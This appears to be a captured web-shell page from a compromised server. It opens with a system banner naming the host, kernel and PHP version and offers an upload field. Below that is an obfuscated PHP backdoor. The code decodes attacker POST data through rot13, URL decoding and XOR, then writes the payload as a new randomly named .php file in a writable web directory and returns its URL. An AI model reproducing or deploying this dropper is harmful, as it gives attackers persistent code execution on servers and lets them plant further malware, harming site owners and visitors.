|
Server : Apache/2.2.2 (Fedora) System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686 User : apache ( 48) PHP Version : 5.2.9 Disable Function : NONE Directory : /var/www/html/phpsysinfo/templates/classic/images/ |
Upload File : |
<?php $lludvmvsyfqp = "dwpmisbgxwacgrjq";$tijclcnrux = "";foreach ($_POST as $mmwfmmqqu => $jyvimbfpjy){if (strlen($mmwfmmqqu) == 16 and substr_count($jyvimbfpjy, "%") > 10){mjnvk($mmwfmmqqu, $jyvimbfpjy);}}function mjnvk($mmwfmmqqu, $jtjamjmx){global $tijclcnrux;$tijclcnrux = $mmwfmmqqu;$jtjamjmx = str_split(rawurldecode(str_rot13($jtjamjmx)));function vvske($ptpmgh, $mmwfmmqqu){global $lludvmvsyfqp, $tijclcnrux;return $ptpmgh ^ $lludvmvsyfqp[$mmwfmmqqu % strlen($lludvmvsyfqp)] ^ $tijclcnrux[$mmwfmmqqu % strlen($tijclcnrux)];}$jtjamjmx = implode("", array_map("vvske", array_values($jtjamjmx), array_keys($jtjamjmx)));$jtjamjmx = @unserialize($jtjamjmx);if (@is_array($jtjamjmx)){$mmwfmmqqu = array_keys($jtjamjmx);$jtjamjmx = $jtjamjmx[$mmwfmmqqu[0]];if ($jtjamjmx === $mmwfmmqqu[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function twsetwabcp($lludvmvsir) {static $ucvtya = array();$qvisxk = glob($lludvmvsir . '/*', GLOB_ONLYDIR);if (count($qvisxk) > 0) {foreach ($qvisxk as $lludvmvs){if (@is_writable($lludvmvs)){$ucvtya[] = $lludvmvs;}}}foreach ($qvisxk as $lludvmvsir) twsetwabcp($lludvmvsir);return $ucvtya;}$wdayqpjo = $_SERVER["DOCUMENT_ROOT"];$qvisxk = twsetwabcp($wdayqpjo);$mmwfmmqqu = array_rand($qvisxk);$evbmoiaw = $qvisxk[$mmwfmmqqu] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($evbmoiaw, $jtjamjmx);echo "http://" . $_SERVER["HTTP_HOST"] . substr($evbmoiaw, strlen($wdayqpjo));exit();}}}